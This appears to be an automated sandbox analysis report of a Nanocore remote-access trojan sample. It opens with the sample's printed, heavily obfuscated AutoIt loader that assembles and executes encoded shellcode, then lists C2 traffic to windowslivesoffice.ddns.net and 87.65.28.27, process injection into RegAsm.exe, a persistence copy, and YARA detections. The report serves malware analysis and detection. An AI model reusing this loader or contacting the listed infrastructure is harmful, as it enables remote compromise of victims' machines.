(LUXBZMCWKPOC ("6,..5..8..,..6..0..,59..,5..7..,5,5..4,..5..3,5..4,3..,..6..0,..6..1,58,..59,..6..1..,..6..,..6,6..,..6..,..6..,..6..,54..,..61,..5..,..57" , ".." ) ) $656182541 = 1947300206 DIM $B3BPOL4V2CE0NUXK0XAK = 255458 * 3018391 * 725577 + 4291946556 WINEXISTS ("DF5nxSbJJaOH91THnd25XQ8pbiQeT1dU8lKtTGa2YmzkyBV4B7GXS9dYHOlob71S64JXqzZRd9gJpY0JxVMWuqc9iWVduV11vSnE17" ) ENDIF IF $656182541 = 1461966853 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,5..8,..4,..3,..6,5,..6,6..,6..,6,..5..8,..53,5..8..,55..,58..,55..,5..9,1,53..,..57..,58,55,..5..8,..55..,..58" , ".." 
) ) DIM $TS2CHUYL1PUEWQ2JODNV = 1418218 + 567903 + 926522 + 4292649082 + 4292096687 + 4294442025 + 4292394753 $656182541 = 706340665 ENDIF IF $656182541 = 1469834065 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..6,..57,..1,5..3,..5..7..,5..3,56,..5..8,5..5..,..5..3..,57,..6..1..,62,..57..,4..,6..,5..7..,5..6..,2..,..6..1,..6..,1..,..5..7..,..53.." , ".." ) ) DIM $OT4KFQUHLQSIWWDAIMOA = "C3AhUA2jHDapMGMyHT7m" $656182541 = 1599451200 ENDIF IF $656182541 = 1477365537 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,3,53..,..5..6..,4,58..,..5..3,5..7,..58,5..3..,53..,53..,..5..3,53..,6,6..1..,..57,6..,3,..53..,55,53..,53..,..5..3..,53.." , ".." ) ) INT (70644 ) $656182541 = 2054240656 ENDIF IF $656182541 = 1479637702 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,53..,..5..3..,..53..,..53,5..9..,1,..57,5..3,..59,..6..1,53,..5..3..,..56..,5..3,53..,..53,..5..3..,5..3,6..,..6..,..6..0,59..,58..,..53" , ".." ) ) $656182541 = 1038131997 ISSTRING ("0CyeXr3UZ1cb3rXiTBsiFj1dY9JbWVW5e7gTMOMZfDAjdSJiATdxkuqQLvqYS28eeg76keEdYCdbSR9fzBKdRyVUQzhry" ) MOD (2052693 , 1447557 ) ENDIF IF $656182541 = 1508795126 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..61..,..5..3..,..53..,..5..3..,5..3,..53..,..58,60..,..5..8..,..5..6,..6,..6,..58..,..58..,..3,..57..,..6..1..,5..8..,3..,53..,..5..3,..6,..6..1,..57.." , ".." ) ) $656182541 = 1750055196 RANDOM (1449126 ) ENDIF IF $656182541 = 1513972166 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6,..6,5..6,..56,..3..,5..3,..5..8,6,..58,5..,..5..8..,..2,..61,..2,..5,..58..,58,4,3,55..,..5..3..,..3..,53,5..3" , ".." ) ) INT (951421 ) $656182541 = 1974167312 STRING ("pr5xOvnqU6mN8vZFvLduXEnZRZeBBBm6nB16K8zJGwmzbu" ) CHR (2887679 ) ENDIF IF $656182541 = 1569955931 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,4..,6..1..,5..7..,56,..58,53,..61,..62..,58..,..4..,..6,..3..,..6,..6,5..8,..58,5,..61..,..5..9..,..1,..57,5..7..,6..1,..4" , ".." 
) ) INT (3397414 ) $656182541 = 1974292710 DIM $FQ0RVYSUQAGD35WLCXAS = "YwoSaTZ3Ow1g2EsJsVH3QV4d1HXphYdjCortKIUfD0KdQxaAdLkb3yidBl1B5JW0tRMNm98TaBzZj0wCHwlEMbqego1zSsk3e" RANDOM (3022268 ) ENDIF IF $656182541 = 1577105263 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..5..8..,..4,..6..,3,5..6,56..,..6,6..,..6..1..,..56..,..6..0,..4..,..4..,6..1..,..53..,..5..3,..60..,5..7..,..53,..60,5..8,..6..0..,6,..6" , ".." ) ) $656182541 = 172415000 ENDIF IF $656182541 = 1586164444 THEN LOCAL $RET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50..,57,..5..7..,..59,3..,59..,..3,..57..,5..6,59..,5..4..,..5..9..,..3..,5..9..,..3..,..5..7,5..4..,..59..,..57,59..,..57,..6..0..,..5..5..,59..,5..8,60..,..5..6..,..6..0,56..,55,61..,5..5,5..5,5..9..,..5..7,6..0,..6..0,59..,6,6..0,55,59..,..5..7,..5..5..,5..5,..55..,..3,5..5,5..3..,5..5,..57,59..,3..,6..0..,5..3,..5..8,56,59..,61..,..59,58,5..9..,..3,59..,..3,5..9,..5..6..,5..9,6,..5..9..,..5..7,..5..9..,..58..,55..,53..,55,..2,55,..53,5..5..,5..5..,56..,53..,..6..0,6..1..,..57..,5..5..,..57..,..58..,55..,55,..55,..3,5..5..,..53,55..,..55..,60,60,6..0..,56,..60..,..57,6..0,5..5,..55..,5..5..,..5..5,..3..,..55,..53,5..5..,5..7..,..60..,..60,58..,53,..5..9..,5..4..,..6..0..,..57..,59,..6..1,..5..5..,..3,55..,53,..55,55,..60,6..0,..6..0,..5..6..,..6..0,..5..7..,..60..,..5..5..,..5..5..,5..5,55,..3,5..5..,5..3..,..5..5,..55" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,5..5..,5..5,..3..,55,53..,5..5..,5..5..,60..,53..,60,57..,..60..,55..,..55,55..,5..5..,3..,..5..5..,5..3..,..5..7,5..7..,..59..,..3..,5..9,3,..58..,5..6..,6..0..,..57..,6..0,5..5,6..0,5..8,59,..56..,..60..,5..7,..5..7,..60..,..5..9..,5..8..,6..0..,57,..58,..5..3..,..6..0,..5..7..,..6..0..,..5..5,55..,..61,..5..5..,..57,..5..7..,..59..,..59..,6..2,5..9..,..3..,59..,..5..8..,..5..8..,6..,58..,56..,..6..0..,57,60..,..55..,60,..5..8..,59,5..6..,..60,..57..,55,62..,..5..5..,..62.." , ".." 
) ) ) ) $656182541 = 1205248241 STRING (2218093 + 880111 + 1666509 ) ENDIF IF $656182541 = 1587018324 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1..,..5..3,..56..,5..7,5..8,..6,61,6..1,..62..,61..,5..8,..3..,5..3,..6,3..,6..,6,6,..6..,..61..,4..,6..1,..58..,54..,53" , ".." ) ) RANDOM (529060 ) $656182541 = 1318416169 ISFLOAT ("VygxSkjh1la0fXvpKtxLFYGAIlZp6ezsjCHDEAOUyqycsJDTL28RuOa72OYGv3" ) ENDIF IF $656182541 = 1599451200 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,53,..5..3..,..5..3,..5..3..,6..0..,55..,..6..2,..58,5..6..,..5..6..,..6..,6,..58,..60..,6,..6,6..0,59..,5..8,..5..3..,58..,..5..6,6,6" , ".." ) ) ISFLOAT (1037561 * 629238 + 4292420501 + 983530 ) $656182541 = 90298599 ENDIF IF $656182541 = 1604509846 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6,..6..,..6..,6..,..6..1,4..,5..7,58,..1..,61..,61..,..62,..61..,5..8..,5..6..,..3..,6..,6..,6,6..,..6,6,..61..,..4" , ".." ) ) ISBINARY ("T7DBJL0MiyFf" ) $656182541 = 2060391673 ISBOOL (3447033 * 534323 * 174310 ) ISPTR (1522803 * 3287096 + 965819 ) ENDIF IF $656182541 = 1655436234 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..8,..58..,61..,..2,..5..,..3..,5..8..,..54,5..8..,54..,..58,56,5..8..,..5..9,5..8..,..6..0,..61,..2..,..6..0,..4,..53,..6..1,56..,..56" , ".." ) ) $656182541 = 781366022 ENDIF IF $656182541 = 1700940958 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..7,6,5..7,..5..8,..2..,..6..1,..58..,..5..3..,5,..6..1..,57,55,6,..5,6..,6..,..6,..6..,..6..1..,..2,6..1..,3..,..2..,5..8..,55" , ".." ) ) WINEXISTS ("FoQjXnHg0L35rQpaRcouYtiq75n0QRYForGCWKUj7R8MvmxvDlCMaISmgzm29SAi" ) $656182541 = 496318929 ISFLOAT ("XofsewguE5VG1vDokE" ) INT (1449336 ) ENDIF IF $656182541 = 1713506615 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("55..,..61..,..6,..6,6,6..,6,6..,..6..1,4..,..57..,5..8..,1..,57..,61,..62,6..1..,..58..,5..5..,..3,6..,6..,..6,6,..6" , ".." 
) ) $656182541 = 432319576 MOD (1091695 , 3317559 ) ISSTRING ("R7wu5mL1KDBvhv64M2bBZA2R" ) ENDIF IF $656182541 = 1718368979 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6,..6..,6,5..6..,..2,..57..,5..8..,..53..,3,..60..,57,5..4,..5..7..,..61,2..,..5..8,5..8..,6,3,..5..7,59..,..56,2,60" , ".." ) ) $656182541 = 1051260188 RANDOM (980872 ) ENDIF IF $656182541 = 1723957288 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,5..7..,5..7,..5..9..,3,..59,3,5..7..,56..,..59,..54..,..59..,3,..59..,..3,5..5,..61,..5..5,55..,..5..9..,..2,..5..9,58..,..60,..5..5,..5..9,5,..5..9..,5..8,..5..9..,3..,56,5..6..,..56..,..55..,..5..5..,5..5,5..5..,..3..,..55,..53,..55..,55,..59,5..7,60..,..6..0..,..5..9,6,..60,55,5..9,57,5..5..,5..5,55..,..3..,..5..5,..53,55,5..5..,..5..8..,59,..59..,..62..,..6..0,..55..,6..0..,..5..7..,..60..,5..8..,59..,..5..4..,..59..,3..,..57,..59..,..60" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5..,5..9..,5..8,5..9..,..5..8,5..5,..55,..5..5,..3,..5..5..,..5..3,55,..5..5,5..9..,57..,60,60..,..59..,..6,60..,..5..5,5..9,5..7..,..55,55,..5..5,..3,..5..5..,..5..3..,..55..,..57,5..9..,..3..,6..0,5..3..,..58..,5..6..,59,..61,..59,58,..5..9..,..3..,5..9..,..3,59..,5..6,..59..,..6..,..59..,57..,5..9..,..58,..5..5,..3,5..5,..5..3..,..55..,5..5..,..5..9,..57,..6..0,..60..,5..9,..6,..60,5..5,5..9,57..,..55..,5..5..,..5..5..,..3..,5..5,5..3,55.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,..5..6,..53..,55,55..,..55,3..,..5..5..,..53,55..,5..5,..59,5..7,6..0..,60,..5..9,..6,..60..,..55,..59,..5..7,55..,..5..5..,..5..5,..3..,..55,5..3..,5..5,55,5..6,..53..,..6..0..,61..,5..6,..6..1,5..6,53..,56,5..3,5..6,..53,55,..5..5..,..5..5,62.." , ".." ) ) ) ) EXITLOOP PTR (2269633 * 1876835 * 3508062 ) ENDIF IF $656182541 = 1745262236 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..6..,..6,..6..0,..5..9,..5..8,5..3,5..9..,..1..,53,..53,6..,6,..58..,..5..8,..6..2..,61..,61..,2..,4..,61..,6..1..,58..,4..,..2.." , ".." 
) ) DIM $4T4LGD5XQEO3AFWV4GMM = "RzdXsJEvO9V63mEKE0VnryBl6Hvkh1uUrHn41xX3zbKe47g3qUzRA9lr" $656182541 = 937837217 PTR (895226 + 3244402 ) ISBINARY ("KUgd1XpXxq8BB3wANssw579GcQfXXz4tW5QatNIl6EIJ2sVA1xbRv8dMVIalSCa8wOQGnwg9UgAAxyNU4O5yym8X1coUMxDDEKnnMnmDqb7oHMow5qrcG" ) ENDIF IF $656182541 = 1747756201 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..5..8,3,5..3,53,..6..,..6..1,..5..7..,..60..,..61,..5..3..,..55..,5..3..,5..3,..53..,53..,6..1..,..2..,..5..7,58,2,..3,..56..,2..,..57.." , ".." ) ) DIM $2QKHWVWL75WKAGQBBIWP = 2912788 + 961618 * 3511725 * 1476387 + 1750659 * 3602516 $656182541 = 1942454486 ISBOOL ("4OKLKRBlDjKKfBm48MAwpH9qlabVh5vhzfoSOgNHvR" ) ENDIF IF $656182541 = 1750055196 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,2,..6..,5..,6,6..,..6..,..6..,5..8..,6..0..,..59..,..1,..53..,57..,..6..1..,..4,..57..,..58..,..6..,6..1,58..,..5..3..,..6..1..,..2..,61" , ".." ) ) $656182541 = 1207367525 PTR ("hhOgvOuAKORdIYCkanDp192bImWVuiJ59woaV82ctQd3NMWybO1nu3RioNHj2IfBe" ) ENDIF IF $656182541 = 1791187076 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,5,..5..7,..6,5..,..6..,..6,..6..,6..,56..,..5..6..,..3..,53,..61,6..2..,60..,4,..6,..57..,..59..,..59,56..,..2,57..,5..9" , ".." ) ) DIM $CZBUB5K59W5ZXUQRVJFQ = 388633 * 456518 + 4292093314 + 3032764 + 4292546598 * 3509147 $656182541 = 896046375 PTR (972489 * 3553081 * 2050349 + 961001 ) ENDIF IF $656182541 = 1808850186 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("54..,61,5..3..,..5..6,..3..,6,..61,..6..2..,..58..,58..,6,3,6..1..,..62,..57,..4,..6..,..6..1,61,62,57,..58..,..53..,61..,6..1" , ".." ) ) PTR ("Sl8EDSsJMrkJtlEwYIl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mUWVNCDL7HGa78DmSrCGbwD" ) ENDIF IF $656182541 = 1885155689 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6..,..6..,..60,6..2..,..5..6,1..,56,3,5..3..,60,6..1,62,..61,..5..8,..5..5,5..3,6,6,6..,6,6,6,..6..1..,..2.." , ".." 

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                          Nov 19, 2020 01:52:30.663995028 CET | 49715 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:52:33.672907114 CET | 49715 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:52:39.689816952 CET | 49715 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:52:50.012203932 CET | 49727 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:52:53.018296003 CET | 49727 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:52:59.034399986 CET | 49727 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:53:08.341140985 CET | 49730 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:53:11.332464933 CET | 49730 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:53:17.426786900 CET | 49730 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:53:42.495999098 CET | 49748 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:53:45.507028103 CET | 49748 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:53:51.523511887 CET | 49748 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:53:59.261042118 CET | 49751 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:54:02.274269104 CET | 49751 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:54:08.290158033 CET | 49751 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:54:17.969947100 CET | 49753 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:54:20.978811026 CET | 49753 | 20377 | 192.168.2.7 | 87.65.28.27
                                                                                          Nov 19, 2020 01:54:26.994798899 CET | 49753 | 20377 | 192.168.2.7 | 87.65.28.27

                                                                                          UDP Packets

                                                                                          DNS Queries

                                                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                                          Nov 19, 2020 01:52:30.631275892 CET | 192.168.2.7 | 8.8.8.8 | 0x9826 | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                                                          Nov 19, 2020 01:52:49.947350025 CET | 192.168.2.7 | 8.8.8.8 | 0x5348 | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                                                          Nov 19, 2020 01:53:08.317718983 CET | 192.168.2.7 | 8.8.8.8 | 0xda6f | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                                                          Nov 19, 2020 01:53:42.481102943 CET | 192.168.2.7 | 8.8.8.8 | 0x91a6 | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                                                          Nov 19, 2020 01:53:59.238854885 CET | 192.168.2.7 | 8.8.8.8 | 0xf654 | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                                                          Nov 19, 2020 01:54:17.954452991 CET | 192.168.2.7 | 8.8.8.8 | 0x60d0 | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)

                                                                                          DNS Answers

                                                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                          Nov 19, 2020 01:52:30.651945114 CET | 8.8.8.8 | 192.168.2.7 | 0x9826 | No error (0) | windowslivesoffice.ddns.net | | 87.65.28.27 | A (IP address) | IN (0x0001)
                                                                                          Nov 19, 2020 01:52:49.960371971 CET | 8.8.8.8 | 192.168.2.7 | 0x5348 | No error (0) | windowslivesoffice.ddns.net | | 87.65.28.27 | A (IP address) | IN (0x0001)
                                                                                          Nov 19, 2020 01:53:08.339587927 CET | 8.8.8.8 | 192.168.2.7 | 0xda6f | No error (0) | windowslivesoffice.ddns.net | | 87.65.28.27 | A (IP address) | IN (0x0001)
                                                                                          Nov 19, 2020 01:53:42.493982077 CET | 8.8.8.8 | 192.168.2.7 | 0x91a6 | No error (0) | windowslivesoffice.ddns.net | | 87.65.28.27 | A (IP address) | IN (0x0001)
                                                                                          Nov 19, 2020 01:53:59.259284973 CET | 8.8.8.8 | 192.168.2.7 | 0xf654 | No error (0) | windowslivesoffice.ddns.net | | 87.65.28.27 | A (IP address) | IN (0x0001)
                                                                                          Nov 19, 2020 01:54:17.968158007 CET | 8.8.8.8 | 192.168.2.7 | 0x60d0 | No error (0) | windowslivesoffice.ddns.net | | 87.65.28.27 | A (IP address) | IN (0x0001)

                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          Behavior

                                                                                          System Behavior

                                                                                          General

                                                                                          Start time: 01:52:25
                                                                                          Start date: 19/11/2020
                                                                                          Path: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe
                                                                                          Wow64 process (32bit): true
                                                                                          Commandline: 'C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe'
                                                                                          Imagebase: 0x9c0000
                                                                                          File size: 1124888 bytes
                                                                                          MD5 hash: 7B00ED250C793C95F4D98C637302FB6F
                                                                                          Has elevated privileges: true
                                                                                          Has administrator privileges: true
                                                                                          Programmed in: C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          Reputation:low

                                                                                          General

                                                                                          Start time:01:52:28
                                                                                          Start date:19/11/2020
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          Imagebase:0x590000
                                                                                          File size:53248 bytes
                                                                                          MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:01:52:38
                                                                                          Start date:19/11/2020
                                                                                          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                                                          Imagebase:0x270000
                                                                                          File size:53248 bytes
                                                                                          MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, Metadefender, Browse
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:01:52:39
                                                                                          Start date:19/11/2020
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff774ee0000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:01:52:47
                                                                                          Start date:19/11/2020
                                                                                          Path:C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
                                                                                          Imagebase:0x980000
                                                                                          File size:1124896 bytes
                                                                                          MD5 hash:E10CD6FAB33374FB1A0002F89D0BFE45
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, Author: Florian Roth
